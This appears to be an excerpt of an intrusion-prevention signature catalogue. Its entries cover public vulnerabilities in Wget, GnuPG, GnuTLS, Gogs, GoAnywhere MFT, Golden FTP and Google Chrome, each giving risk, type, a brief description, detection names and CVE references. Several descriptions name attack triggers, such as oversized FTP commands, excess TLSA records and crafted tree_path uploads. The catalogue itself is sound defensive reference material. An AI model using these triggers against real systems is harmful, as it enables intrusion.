HTTP_SCH-Gnu-Wget-Skip_Short_Body-Stack-Buffer-Overflow

References:

CVE-2017-13089
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13089

GnuPG-Message-Packet-Length-Handling-Integer-Overflow

About this vulnerability:

A vulnerability in Free Software Foundation GnuPG

Risk:

Moderate

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GnuPG

Type:

Integer Overflow

Description:

There exists an integer overflow vulnerability in the GnuPG (GNU Privacy Guard) product. The problem is caused by an incorrect handling of the user supplied data. An attacker can exploit this vulnerability to crash a vulnerable application or execute arbitrary code in the security context of the currently running process. In an attack case where code injection is not successful, the affected application will terminate abnormally. In a more sophisticated attack where code injection results is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.

Situation:

File-TextId_GnuPG-Message-Packet-Length-Handling-Integer-Overflow

References:

CVE-2006-3746
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3746

BID-19110
http://www.securityfocus.com/bid/19110

OSVDB-27664
http://www.osvdb.org/27664

Gnutella-Peer-To-Peer-Network-Usage

About this vulnerability:	Gnutella Peer-To-Peer Network usage
Risk:	Moderate
First detected in:	sgpkg-ips-12-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Gnutella
Type:	Peer-to-Peer
Description:	Gnutella is a peer-to-peer network that can be used to share files. File sharing can expose to security risks if unintentionally sharing confidential files or downloading files that contain malicious content such as viruses, worms, or backdoors.
Situation:	HTTP_CSH-P2P-Phex-Client P2P-TCP_Gnutella-Connect P2P-TCP_Gnutella-Response

GnuTLS-Certificate-Verification-Policy-Bypass

About this vulnerability:

A vulnerability in GnuTLS GnuTLS

Risk:

High

First detected in:

sgpkg-ips-595-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GnuTLS

Type:

Malfunction

Description:

A policy bypass vulnerability has been found in GnuTLS. The vulnerability is due to an error in validating certificates. A remote attacker can employ this vulnerability to bypass certificate validation performed by an application using a vulnerable version of the GnuTLS library.

Situation:

HTTPS_SS-GnuTLS-Certificate-Verification-Policy-Bypass

References:

CVE-2014-0092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0092

OSVDB-103933
http://www.osvdb.org/103933

GnuTLS-DANE-dane.c-Heap-Buffer-Overflow

About this vulnerability:

A GnuTLS DANE dane.c Heap Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-1008-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GnuTLS

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in GnuTLS which allows remote attackers to execute arbitrary code by sending a client more than 4 TLSA records in a DNS response during DANE verification, due to an error in the function dane_query_tlsa() in libdane/dane.c while processing TLSA records.

Situation:

DNS-UDP_GnuTLS-DANE-dane.c-Heap-Buffer-Overflow

References:

CVE-2013-4466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4466

GnuTLS-Libtasn1-_ASN1_extract_der_Octet-Memory-Access-Error

About this vulnerability:

A vulnerability in GnuTLS libtasn1

Risk:

High

First detected in:

sgpkg-ips-653-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GnuTLS libtasn1; GnuTLS

Type:

Malfunction

Description:

A memory access error vulnerability exists in libtasn1, a component of GnuTLS. The vulnerability is due to a flaw in _asn1_extract_der_octet() that causes libtasn1 to read beyond the allocated buffer when processing a specially crafted DER-encoded input. A remote attacker can exploit this vulnerability in GnuTLS by sending a crafted ASN.1 certificate to a target application. Successful exploitation may result in a denial-of-service condition.

Situation:

HTTPS_CS-GnuTLS-Libtasn1-_ASN1_extract_der_Octet-Memory-Access-Error

References:

CVE-2015-3622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3622

BID-74419
http://www.securityfocus.com/bid/74419

GnuTLS-Proxy-Certificate-Information-Extension-Memory-Corruption

About this vulnerability:

A vulnerability in GnuTLS

Risk:

High

First detected in:

sgpkg-ips-867-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GnuTLS

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in the GnuTLS library. A remote attacker can exploit this to execute arbitrary code on the affected system.

Situation:

HTTPS_CS-GnuTLS-Proxy-Certificate-Information-Extension-Memory-Corruption
HTTPS_SS-GnuTLS-Proxy-Certificate-Information-Extension-Memory-Corruption

References:

CVE-2017-5334
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5334

GnuTLS-Server-Hello-Session-Id-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in GnuTLS GnuTLS

Risk:

Moderate

First detected in:

sgpkg-ips-590-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GnuTLS

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability has been found in GnuTLS. The vulnerability is due to lack of bounds checking of the Session ID field in a TLS Server Hello message. A remote, unauthenticated attacker can exploit this vulnerability to cause a buffer overflow and achieve arbitrary code execution in an application using a vulnerable version of the GnuTLS library.

Situation:

HTTPS_SS-GnuTLS-Server-Hello-Session-Id-Heap-Buffer-Overflow

References:

CVE-2014-3466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3466

BID-67741
http://www.securityfocus.com/bid/67741

OSVDB-107564
http://www.osvdb.org/107564

GnuTLS-Status_request-Extension-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in GnuTLS

Risk:

High

First detected in:

sgpkg-ips-941-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GnuTLS

Type:

Malfunction

Description:

There exists a denial of service vulnerability in the GnuTLS library.

Situation:

HTTPS_CS-GnuTLS-Status_request-Extension-Null-Pointer-Dereference

References:

CVE-2017-7507
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7507

GnuTLS-TLS-Record-GenericBlockCipher-Parsing-Integer-Overflow

About this vulnerability:

A vulnerability in Free Software Foundation GnuTLS

Risk:

High

First detected in:

sgpkg-ips-451-4333

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GnuTLS

Type:

Integer Overflow

Description:

A memory corruption vulnerability has been reported in GnuTLS. The flaw is due to an error in ciphertext_to_compressed() which fails to verify the size of the ciphertext. This vulnerability can cause memory corruption. A remote attacker can exploit this vulnerability by sending a TLS Application Data Packet with a length of 32 bytes (0x20). Successful exploitation may allow the attacker to execute arbitrary code in the context of the service, or crash the target service which uses the library, causing a Denial Of Service condition.

Situation:

Generic_CS-GnuTLS-TLS-Record-GenericBlockCipher-Parsing-Integer-Overflow
Generic_UDP-GnuTLS-TLS-Record-GenericBlockCipher-Parsing-Integer-Overflow
HTTPS_CS-GnuTLS-TLS-Record-GenericBlockCipher-Parsing-Integer-Overflow
TLS_CS-GnuTLS-TLS-Record-GenericBlockCipher-Parsing-Integer-Overflow

References:

CVE-2012-1573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1573

OSVDB-80259
http://www.osvdb.org/80259

Go-Continuous-Delivery-Pre-Auth-Local-File-Read

About this vulnerability:	An attempt to exploit a vulnerability in Go Continuous Delivery detected
Risk:	High
First detected in:	sgpkg-ips-1403-5242
Last changed:	sgpkg-ips-1403-5242
Platform:	Generic
Software:	Go Continuous Delivery
Type:	Malfunction
Description:	An attempt to exploit a vulnerability in Go Continuous Delivery detected.
Situation:	HTTP_CSU-Go-Continuous-Delivery-Pre-Auth-Local-File-Read

GoAhead-Web-Server-Source-Code-Exposure

About this vulnerability:

GoAhead Web Server Source Code Exposure

Risk:

High

First detected in:

sgpkg-ips-631-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

GoAhead Webserver

Type:

Input Validation

Description:

There exists a vulnerability in GoAhead Web Server. A remote attacker can get access to the source code of ASP files due to improper filtering of special characters.

Situation:

HTTP_CSU-GoAhead-Web-Server-Source-Code-Exposure

References:

CVE-2002-1603
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1603

BID-9239
http://www.securityfocus.com/bid/9239

OSVDB-13295
http://www.osvdb.org/13295

GoAhead-Webserver-Directory-Traversal

About this vulnerability:

A vulnerability in GoAhead WebServer

Risk:

High

First detected in:

sgpkg-ips-609-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GoAhead Webserver

Type:

Malfunction

Description:

There is a directory traversal vulnerability in GoAhead WebServer (embedded by TV-IP201 Internet Camera), which allows an attacker to bypass autorization and to access the admin panel.

Situation:

HTTP_CSU-GoAhead-Webserver-Directory-Traversal

References:

BID-5197
http://www.securityfocus.com/bid/5197

GoAnywhere-MFT-Authentication-Bypass-CVE-2024-0204

About this vulnerability:

A vulnerability in Fortra GoAnywhere MFT

Risk:

High

First detected in:

sgpkg-ips-1685-5242

Last changed:

sgpkg-ips-1685-5242

Platform:

Generic

Software:

GoAnywhere MFT

Type:

Input Validation

Description:

An improper access control vulnerability has been reported in Fortra GoAnywhere MFT. The vulnerability is due to improper validation of URIs to the InitialAccountSetup.xhtml endpoint. Successful exploitation could result in an attacker creating an administrator account on the target server, which may allow arbitrary code execution under the security context of the root or SYSTEM account.

Situation:

HTTP_CSU-GoAnywhere-MFT-Authentication-Bypass-CVE-2024-0204

References:

CVE-2024-0204
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0204

GoAnywhere-MFT-Remote-Code-Execution-CVE-2023-0669

About this vulnerability:

A vulnerability in GoAnywhere MFT

Risk:

High

First detected in:

sgpkg-ips-1554-5242

Last changed:

sgpkg-ips-1557-5242

Platform:

Generic

Software:

GoAnywhere MFT

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in Fortra GoAnywhere MFT. The vulnerability is due to insufficient validation of user-supplied data sent to the License Response Servlet exposed on the administrative interface. A remote, unauthenticated attacker could exploit the vulnerability by sending crafted requests to the target server. Successful exploitation can result in arbitrary code execution under the security context of SYSTEM or root.

Situation:

HTTP_CRL-GoAnywhere-MFT-Remote-Code-Execution-CVE-2023-0669

References:

CVE-2023-0669
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0669

Gogs-DeleteRepoFile-Internal-File-Deletion-CVE-2024-39931

About this vulnerability:

A vulnerability in Gogs

Risk:

Moderate

First detected in:

sgpkg-ips-1852-5242

Last changed:

sgpkg-ips-1852-5242

Platform:

Generic

Software:

Gogs

Type:

Input Validation

Description:

Improper validation of the Request-URI in the file deletion handler causes a file deletion vulnerability in Gogs. A successful exploitation allows an attacker to delete files in the .git directory and possibly execute code on the target system.

Situation:

HTTP_CSU-Gogs-DeleteRepoFile-Internal-File-Deletion-CVE-2024-39931

References:

CVE-2024-39931
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39931

Gogs-File-Upload-Tree_path-Command-Injection

About this vulnerability:

A vulnerability in Gogs

Risk:

Moderate

First detected in:

sgpkg-ips-1462-5242

Last changed:

sgpkg-ips-1462-5242

Platform:

Generic

Software:

Gogs

Type:

Input Validation

Description:

A command injection vulnerability has been reported in Gogs. The vulnerability is due to improper validation on the tree_path parameter when uploading files to a repository. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server and overwriting the repository configuration file. Successful exploitation will result in arbitrary OS command execution on the target server.

Situation:

HTTP_CRL-Gogs-File-Upload-Tree_path-Command-Injection
HTTP_CSH-Gogs-File-Upload-Tree_path-Command-Injection

References:

CVE-2022-0415
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0415

Gogs-File-Upload-Tree_path-CVE-2022-2024-Command-Injection

About this vulnerability:

A vulnerability in Gogs

Risk:

Moderate

First detected in:

sgpkg-ips-1570-5242

Last changed:

sgpkg-ips-1570-5242

Platform:

Generic

Software:

Gogs

Type:

Input Validation

Description:

Situation:

HTTP_CRL-Gogs-File-Upload-Tree_path-CVE-2022-2024-Command-Injection

References:

CVE-2022-2024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2024

Gogs-Full-Name-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Gogs Gogs

Risk:

Moderate

First detected in:

sgpkg-ips-1520-5242

Last changed:

sgpkg-ips-1520-5242

Platform:

Generic

Software:

Gogs

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported for Gogs. This vulnerability is due to improper validation of full names. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary script execution on the victim's browser.

Situation:

HTTP_CRL-Gogs-Full-Name-Stored-Cross-Site-Scripting

References:

CVE-2022-32174
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32174

Gogs-Git-Endpoints-Directory-Traversal

About this vulnerability:

A vulnerability in Gogs.

Risk:

High

First detected in:

sgpkg-ips-1481-5242

Last changed:

sgpkg-ips-1481-5242

Platform:

Generic

Software:

Gogs

Type:

Directory Traversal

Description:

A vulnerability in Gogs, versions prior to 0.12.9, which allows remote attackers to disclose sensitive information via a directory traversal in Git endpoints.

Situation:

HTTP_CSU-Gogs-Git-Endpoints-Directory-Traversal

References:

CVE-2022-1993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1993

Gogs-Git-Hooks-Remote-Code-Execution

About this vulnerability:

A vulnerability in Gogs.

Risk:

High

First detected in:

sgpkg-ips-1368-5242

Last changed:

sgpkg-ips-1368-5242

Platform:

Unix; Linux; Windows

Software:

Gogs

Type:

Input Validation

Description:

A vulnerability in Gogs, version 0.12.3, which allows remote attackers to execute arbitrary code by setting a post-receive git hook with a payload.

Situation:

HTTP_CRL-Gitea-And-Gogs-Git-Hooks-Remote-Code-Execution

References:

CVE-2020-15867
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15867

Gogs-Repository-Contents-API-Path-Traversal

About this vulnerability:

A vulnerability in Gogs

Risk:

Moderate

First detected in:

sgpkg-ips-1841-5242

Last changed:

sgpkg-ips-1841-5242

Platform:

Generic

Software:

Gogs

Type:

Directory Traversal

Description:

A path traversal vulnerability has been reported for Gogs. The vulnerability is due to improper validation of the Request-URI in the Repository Contents API. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successfully exploiting this vulnerability could result in arbitrary file write and, in the worst case, command execution.

Situation:

HTTP_CRL-Gogs-Repository-Contents-API-Path-Traversal

References:

CVE-2024-55947
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55947

Golden-FTP-Server-Buffer-Overflow

About this vulnerability:

Golden FTP Server 1.92 and 4.7 Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-647-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Golden FTP Server

Type:

Buffer Overflow

Description:

A heap based buffer overflow vulnerability in Golden FTP Server 1.92 and 4.7 which allows remote attackers to execute arbitrary code, or cause a denial of service condition, via a long PASS command.

Situation:

FTP_CS-Oversized-Pass-With-Suspicious-Argument

References:

CVE-2006-6576
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6576

BID-45957
http://www.securityfocus.com/bid/45957

OSVDB-35951
http://www.osvdb.org/35951

Golden-FTP-Server-RNTO-BOF

About this vulnerability:

Buffer overflow in Golden FTP server RNTO command

Risk:

High

First detected in:

sgpkg-ips-23-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Golden FTP Server

Type:

Buffer Overflow

Description:

Golden FTP server is vulnerable to a buffer overflow. A remote attacker could send a RNTO command to overflow a buffer and execute arbitrary commands with the privileges of the server process.

Situation:

FTP_CS-Golden-FTP-Server-RNTO-BOF

References:

CVE-2005-0566
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0566

BID-12333
http://www.securityfocus.com/bid/12333

OSVDB-13139
http://www.osvdb.org/13139

Golden-FTP-Server-User-Command-BOF

About this vulnerability:

Buffer overflow in Golden FTP server USER command

Risk:

High

First detected in:

sgpkg-ips-26-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Golden FTP Server

Type:

Buffer Overflow

Description:

Golden FTP server has a buffer overflow in the USER command handling. A remote attacker could send a long USER command to overflow a buffer and to execute arbitrary code on the server.

Situation:

FTP_CS-Golden-FTP-Server-User-Command-BOF

References:

CVE-2005-0634
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0634

BID-12704
http://www.securityfocus.com/bid/12704

OSVDB-14369
http://www.osvdb.org/14369

GOM-Player-ActiveX-Control-OpenURL-Method-Buffer-Overflow

About this vulnerability:

A vulnerability in GOM Player ActiveX Control

Risk:

High

First detected in:

sgpkg-ips-262-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Gretech Online Movie Player

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Gretech Online Movie (GOM) Player ActiveX control. The vulnerability is due to a lack of input validation when handling arguments of a particular method. A remote attacker can exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation allows arbitrary code injection and execution with the privileges of the currently logged in user.

Situation:

HTTP_SS-GOM-Player-ActiveX-Control-OpenURL-Method-Buffer-Overflow
File-Text_GOM-Player-ActiveX-Control-OpenURL-Method-Buffer-Overflow

References:

CVE-2007-5779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5779

BID-26236
http://www.securityfocus.com/bid/26236

GoodTech-SSH-Server-Sftp-Processing-Buffer-Overflow

About this vulnerability:

A vulnerability in GoodTech Systems SSH Server

Risk:

Moderate

First detected in:

sgpkg-ips-437-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GoodTech SSH Server

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in GoodTech SSH Server. The vulnerability is due to a boundary error while handling SFTP commands. A remote attacker can exploit this vulnerability by sending crafted SFTP commands to the target server, potentially causing arbitrary code to be injected and executed in the security context of the service, SYSTEM by default. In a sophisticated attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected service, SYSTEM by default. In an attack case where code injection is not successful, the affected service can terminate abnormally and result in a denial of service condition.

Situation:

SSH_GoodTech-SSH-Server-Sftp-Processing-Buffer-Overflow

References:

CVE-2008-4726
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4726

BID-31879
http://www.securityfocus.com/bid/31879

GoodTech-Telnet-Administration-Web-Server-BOF

About this vulnerability:

Buffer overflow in GoodTech Telnet administration web server

Risk:

High

First detected in:

sgpkg-ips-23-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

GoodTech Telnet Server

Type:

Buffer Overflow

Description:

GoodTech Telnet Server's administration web server has a buffer overflow vulnerability. A remote attacker could send an overly long string to the vulnerable server to overflow a buffer and to execute arbitrary code.

Situation:

Generic_GoodTech-Telnet-Administration-Web-Server-BOF

References:

CVE-2005-0768
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0768

BID-12815
http://www.securityfocus.com/bid/12815

OSVDB-14806
http://www.osvdb.org/14806

Goofygobot-Botnet

About this vulnerability:	Goofygobot botnet
Risk:	High
First detected in:	sgpkg-ips-1355-5242
Last changed:	sgpkg-ips-1355-5242
Platform:	Linux
Software:	<os>
Type:	Code Injection
Description:	Goofygobot is a worm that infects Linux-based systems.
Situation:	Generic_CS-Goofygobot-Linux-Infection-Traffic

Google-Android-Browser-Same-Origin-Policy-Bypass

About this vulnerability:

A vulnerability in Google Android Browser

Risk:

High

First detected in:

sgpkg-ips-605-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Android

Software:

Google Android Browser

Type:

Malfunction

Description:

A policy bypass vulnerability exists in Google Android Browser. The vulnerability is due to a flaw leading to same origin policy bypass. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to open a web page. Successful exploitation can result in disclosure of information about other web pages opened by the user or stored in the browser cache.

Situation:

File-Text_Google-Android-Browser-Same-Origin-Policy-Bypass

References:

CVE-2014-6041
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6041

BID-69548
http://www.securityfocus.com/bid/69548

OSVDB-110664
http://www.osvdb.org/110664

Google-Apps-Mailto-URI-Argument-Injection

About this vulnerability:

A vulnerability in Google Apps

Risk:

High

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Google Apps

Type:

Input Validation

Description:

There is an argument injection vulnerability in Google Apps that can allow execution of arbitrary programs on a vulnerable system. The vulnerability is due to an input validation error in googleapps.exe while parsing the "googleapps.url.mailto:" URI. This can allow remote attackers to run arbitrary programs from a remote location. Successful exploitation would result in execution of arbitrary programs on the vulnerable system with the privileges of the logged in user.

Situation:

HTTP_SS-Google-Apps-Mailto-URI-Argument-Injection
File-Text_Google-Apps-Mailto-URI

References:

BID-36581
http://www.securityfocus.com/bid/36581

Google-Chrome-And-Apple-Safari-Floating-Styles-Use-After-Free-Code-Execution

About this vulnerability:

A vulnerability in WebKit Open Source Project WebKit

Risk:

Moderate

First detected in:

sgpkg-ips-424-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Chrome; Safari

Type:

Malfunction

Description:

A code execution vulnerability exists Apple Safari and Google Chrome. The vulnerability is due to a use-after-free condition while handling floating style information. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to visit a malicious web site. This can lead to memory corruption and the possibility of code execution in the context of the affected user. If code execution is unsuccessful, the application may terminate abnormally.

Situation:

File-Text_Chrome-Safari-Floating-Styles-Use-After-Free-Code-Execution

References:

CVE-2011-2790
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2790

OSVDB-74240
http://www.osvdb.org/74240

Google-Chrome-And-Apple-Safari-Runin-Handling-Use-After-Free

About this vulnerability:

A vulnerability in Google Chrome

Risk:

Moderate

First detected in:

sgpkg-ips-826-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Chrome

Type:

Malfunction

Description:

There exists a code execution vulnerability in Apple Safari and Google Chrome.

Situation:

File-Text_Google-Chrome-And-Apple-Safari-Runin-Handling-Use-After-Free

References:

CVE-2011-3068
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3068

OSVDB-81038
http://www.osvdb.org/81038

Google-Chrome-Blink-Buildshadowandinstancetree-Use-After-Free

About this vulnerability:

A vulnerability in Google Chrome

Risk:

Moderate

First detected in:

sgpkg-ips-659-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Chrome

Type:

Malfunction

Description:

A use-after-free vulnerability exists in Google Chrome, blink component. The vulnerability is due to error when building a shadow tree for a <use> element with a direct reference to a disallowed element. A remote attacker could exploit this vulnerability by enticing a user to open a malicious webpage. Successful exploitation could result in code execution in the context of the currently logged in user.

Situation:

File-TextId_Google-Chrome-Blink-Buildshadowandinstancetree-Use-After-Free

References:

CVE-2015-1256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1256

OSVDB-122293
http://www.osvdb.org/122293

Google-Chrome-Blink-Imagebitmap-Integer-Overflow

About this vulnerability:

A vulnerability in Google Chrome

Risk:

Moderate

First detected in:

sgpkg-ips-835-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Chrome

Type:

Integer Overflow

Description:

There is an integer overflow in the ImageBitmap::ImageBitmap function of Google Chrome Blink, which an attacker can use a crafted script to exploit to gain the ability to execute arbitrary code on the target system.

Situation:

File-Text_Google-Chrome-Blink-Imagebitmap-Integer-Overflow

References:

CVE-2016-5182
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5182

Google-Chrome-Extension-Package

About this vulnerability:	Google Chrome browser extension installation package
Risk:	Low
First detected in:	sgpkg-ips-372-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Chrome
Type:	Insecure Configuration
Description:	Google Chrome is a popular browser. It allows installation of persistent browser extensions and applications that run inside the browser.
Situation:	HTTP_SS-Google-Chrome-CRX-Extension-Package-Download File-Binary_Google-Chrome-CRX-Extension-Package

Google-Chrome-FileReader-Use-After-Free-CVE-2019-5786

About this vulnerability:

A vulnerability in Google Chrome

Risk:

High

First detected in:

sgpkg-ips-1146-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Chrome

Type:

Use-after-free

Description:

There has been reported a use-after-free vulnerability in Google Chrome. Successful exploitation of this vulnerability can lead in remote code execution.

Situation:

File-Text_Google-Chrome-FileReader-Use-After-Free-CVE-2019-5786

References:

CVE-2019-5786
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5786

Google-Chrome-GURL-Cross-Origin-Bypass

About this vulnerability:

A vulnerability in Google Chrome

Risk:

Moderate

First detected in:

sgpkg-ips-316-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Chrome

Type:

Malfunction

Description:

There is a cross-origin bypass vulnerability in Google Chrome. The vulnerability is due to insufficient validation of URLs in the Google URL (GURL) component, which can lead to violation of the same origin policy. Remote attackers can exploit this vulnerability by enticing target users to visit a malicious website. Successful exploitation of this vulnerability can result in information disclosure and execution of active content outside the prescribed context.

Situation:

HTTP_SS-Google-Chrome-GURL-Cross-Origin-Bypass
File-Text_Google-Chrome-GURL-Cross-Origin-Bypass

References:

CVE-2010-1663
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1663

BID-39813
http://www.securityfocus.com/bid/39813

Google-Chrome-Insufficient-Validation-CVE-2021-21220

About this vulnerability:

An attempt to exploit a vulnerability in Google Chrome detected

Risk:

High

First detected in:

sgpkg-ips-1407-5242

Last changed:

sgpkg-ips-1407-5242

Platform:

Generic

Software:

Chrome

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Google Chrome detected.

Situation:

File-Text_Google-Chrome-Insufficient-Validation-CVE-2021-21220

References:

CVE-2021-21220
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21220

Google-Chrome-Locationattributesetter-Use-After-Free

About this vulnerability:

A vulnerability in Google Chrome

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Chrome

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Google Chrome. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Google-Chrome-Locationattributesetter-Use-After-Free

References:

CVE-2014-1713
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1713

BID-66243
http://www.securityfocus.com/bid/66243

OSVDB-104501
http://www.osvdb.org/104501

Google-Chrome-Multiple-File-Type-Security-Bypass

About this vulnerability:	A vulnerability in Google Chrome
Risk:	Moderate
First detected in:	sgpkg-ips-431-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Chrome
Type:	Malfunction
Description:	A security bypass vulnerability exists in Google Chrome. The vulnerability is due to a design weakness within Chrome's automatic download navigation component. A remote attacker could exploit this vulnerability by enticing a target user to visit a malicious web page using the affected application. Successful exploitation could result in execution of arbitrary code on the vulnerable system in the context of the logged-on user.
Situation:	File-Text_Google-Chrome-Multiple-File-Type-Security-Bypass File-TextId_Google-Chrome-Multiple-File-Type-Security-Bypass

Google-Chrome-Notifyinstancewasdeleted-Use-After-Free

About this vulnerability:

A vulnerability in Google Chrome

Risk:

Moderate

First detected in:

sgpkg-ips-547-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Chrome

Type:

Malfunction

Description:

There is a use after free vulnerability in Google Chrome. The vulnerability is due to memory corruption while handling ready state and domcontentloaded events in a web page. A remote attacker could exploit these vulnerabilities by enticing a user to open a malicious web page. Successful exploitation could permit an attacker to execute arbitrary code in the context of the vulnerable application or bypass security restrictions.

Situation:

File-Text_Google-Chrome-Notifyinstancewasdeleted-Use-After-Free

References:

CVE-2013-2912
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2912

OSVDB-97972
http://www.osvdb.org/97972

Google-Chrome-Object-Lifecycle-Issue

About this vulnerability:

An attempt to exploit a vulnerability in Google Chrome detected

Risk:

High

First detected in:

sgpkg-ips-1407-5242

Last changed:

sgpkg-ips-1407-5242

Platform:

Generic

Software:

Chrome

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Google Chrome detected.

Situation:

File-Text_Google-Chrome-Object-Lifecycle-Issue

References:

CVE-2021-21166
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166

Google-Chrome-Skia-Integer-Overflow-CVE-2023-6345

About this vulnerability:

An attempt to exploit a vulnerability in Google Chrome detected

Risk:

High

First detected in:

sgpkg-ips-1828-5242

Last changed:

sgpkg-ips-1828-5242

Platform:

Generic

Software:

Chrome

Type:

Integer Overflow

Description:

An integer overflow vulnerability in Skia in Google Chrome prior to 119.0.6045.199 allows a remote attacker who has compromised the renderer process to potentially perform a sandbox escape via a malicious file.

Situation:

File-Binary_Google-Chrome-Skia-Integer-Overflow-CVE-2023-6345

References:

CVE-2023-6345
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6345

Google-Chrome-Stale-Pointer-In-Floats-Rendering-Memory-Corruption

About this vulnerability:

A vulnerability in Google Chrome

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Chrome

Type:

Malfunction

Description:

A vulnerability has been identified in Google Chrome. This vulnerability is due to the use of a stale pointer in rendering floats. A remote attacker may exploit this vulnerability by enticing a target user to view a malicious web page. Successful exploitation of this vulnerability could result in the execution of arbitrary code in the security context of the user. An unsuccessful attack may result in abnormal termination of the software.

Situation:

File-Text_Google-Chrome-Stale-Pointer-In-Floats-Rendering-Memory-Corruption

References:

CVE-2011-1804
